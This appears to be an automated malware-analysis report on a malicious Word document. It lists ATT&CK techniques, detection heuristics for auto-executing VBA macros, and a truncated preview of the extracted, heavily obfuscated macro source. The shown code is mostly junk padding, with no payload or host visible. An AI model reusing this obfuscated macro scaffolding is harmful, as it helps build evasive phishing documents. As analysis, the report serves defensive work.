MALICIOUS
162
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing a VBA macro. The 'AutoOpen' macro is present and configured to execute, indicating an attempt to run malicious code upon opening the document. The presence of 'CreateObject' further suggests the macro is designed to instantiate and run objects, likely to download and execute a second-stage payload.
Heuristics 6
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 75857 bytes |
SHA-256: 289740d54fe7d9bebfc8c5ff3c51bba16a33bc16f24b3688f604d1c6f0dcba05 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "hePtoDo"
Public Function UhyR1eb(ByRef XRhXTeFgz As String, ByVal uKn0nULZNlh As String) As String
Dim UYx5rMa() As Byte
Dim vG3FLs As String
vG3FLs = Application.UserName
Dim tiJ8nYhD As Collection
Dim Zt1aBhsh As Integer
While Len(vG3FLs) > 5
Zt1aBhsh = Zt1aBhsh + 5
YfhZENdtnI = Len(vG3FLs) - 8
Wend
If Len(Application.UserName) < 544 Then
Dim koao9Y3d7a As Collection
End If
If Application.UserName = "YoEynbp2Xwf" Then
MsgBox ("ZYQNjEDeRo5")
Else
Dim y8AhvSgg43co7w As String
y8AhvSgg43co7w = Application.UserName
End If
Dim ztK9nUX() As Byte
Dim ndzgBPTA As String
For AQdNeTWcrv = 0 To 5
ndzgBPTA = ndzgBPTA + "R"
Next AQdNeTWcrv
Dim aubWcgQl, VyQlIZD As Integer
aubWcgQl = 6 + 8
For jNtB5Sdq = 0 To 8
VyQlIZD = VyQlIZD + jNtB5Sdq
Next jNtB5Sdq
If VyQlIZD < jNtB5Sdq Then
Dim BOvWNFJGgK As Long
End If
For HJvaIVz0a = 0 To 9
yTLRtBiVYj = yTLRtBiVYj + HJvaIVz0a
Next HJvaIVz0a
Dim m703j9Z0 As Long
For ty0xS7du1V = 9 To 14
m703j9Z0 = m703j9Z0 + ty0xS7du1V
Next ty0xS7du1V
Dim Su62XmYKi, sF5xHh5F As Integer
Su62XmYKi = 5 + 7
For MfzrtB = 0 To 7
sF5xHh5F = sF5xHh5F + MfzrtB
Next MfzrtB
If sF5xHh5F < MfzrtB Then
Dim XOwLHRFaO As Long
End If
For HUM5pip3W = 0 To 8
ri7ICXo = ri7ICXo + HUM5pip3W
Next HUM5pip3W
Dim asuhtuxFwb As Long
Dim OpaQyIagv As Long
For YL6DGWLG = 5 To 16
OpaQyIagv = OpaQyIagv + YL6DGWLG
Next YL6DGWLG
Dim pAZxd3 As String
pAZxd3 = Application.UserName
Dim yTzxkTy As Collection
Dim rMfi6B1y As Integer
While Len(pAZxd3) > 7
rMfi6B1y = rMfi6B1y + 8
y1Lj5x8p = Len(pAZxd3) - 9
Wend
If Len(Application.UserName) < 529 Then
Dim cvS7mUv As Collection
End If
Dim MmNN3C78fxq As Long
For NR1Z94 = 0 To 5
SrubKFY = SrubKFY + NR1Z94
Next NR1Z94
Dim SC6GEwR7zw, Rv7ktg As Integer
SC6GEwR7zw = 8 + 6
For K3RWTRyt = 0 To 8
Rv7ktg = Rv7ktg + K3RWTRyt
Next K3RWTRyt
If Rv7ktg < K3RWTRyt Then
Dim Mvlhc7Q As Long
End If
Dim YJiw4S, zlj7LlE As Integer
YJiw4S = 5 + 7
For T4yUIahNyl = 0 To 5
zlj7LlE = zlj7LlE + T4yUIahNyl
Next T4yUIahNyl
If zlj7LlE < T4yUIahNyl Then
Dim iInNV5xfGs As Long
End If
For OFgRZ7OF5 = 0 To 9
RtIFbirS3 = RtIFbirS3 + OFgRZ7OF5
Next OFgRZ7OF5
If Application.UserName = "tvdu3clFTHP" Then
MsgBox ("GMDbeubUsS5")
Else
Dim fozEMKEyxSe01r As String
fozEMKEyxSe01r = Application.UserName
End If
If Application.UserName = "gct3QAyRQsc" Then
MsgBox ("KlXDU9WNu1K")
Else
Dim aK09H9wjble5aH As String
aK09H9wjble5aH = Application.UserName
End If
If Application.UserName = "P7iiyVxYZGT" Then
MsgBox ("OoBgoAUPy1s")
Else
Dim G5Tn8EUGYr3X91 As String
G5Tn8EUGYr3X91 = Application.UserName
End If
Dim jRWtctAx As Long
Dim Keb5MrSrw, NLLaqjxaST As Integer
Keb5MrSrw = 8 + 8
For Urib0TN3c = 0 To 8
NLLaqjxaST = NLLaqjxaST + Urib0TN3c
Next Urib0TN3c
If NLLaqjxaST < Urib0TN3c Then
Dim siwjUD8QE As Long
End If
If Application.UserName = "MhJTbuP1h6H" Then
MsgBox ("OYr1N8vP7WO")
Else
Dim h2PmB9HQpeRVrv As String
h2PmB9HQpeRVrv = Application.UserName
End If
If Len(Application.UserName) < 771 Then
Dim tb7RPdj As Collection
End If
If Len(Application.UserName) < 978 Then
Dim C8NmLJnt As Collection
End If
If Len(Application.UserName) < 494 Then
Dim ZYgo7Xm As Collection
End If
If Application.UserName = "Ou9Yf5v8VTb" Then
MsgBox ("HGiJBHQauln")
Else
Dim Hg7HK1UbTRYfh7 As String
Hg7HK1UbTRYfh7 = Application.UserName
End If
If Len(Application.UserName) < 515 Then
Dim dHeQytue As Collection
End If
Dim vnWPwZbUi As Long
Dim t1bDwI As String
For aO4tYyO = 0 To 5
t1bDwI = t1bDwI + "Y"
Next aO4tYyO
Dim Gys9U3R As String
For nDFgN7R = 0 To 5
Gys9U3R = Gys9U3R + "z"
Next nDFgN7R
Dim UTNXCQ56mQ As String
For agPRaA = 0 To 9
UTNXCQ56mQ = UTNXCQ56mQ + "W"
Next agPRaA
If Application.UserName = "q2zPQszwOib" Then
Ms
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.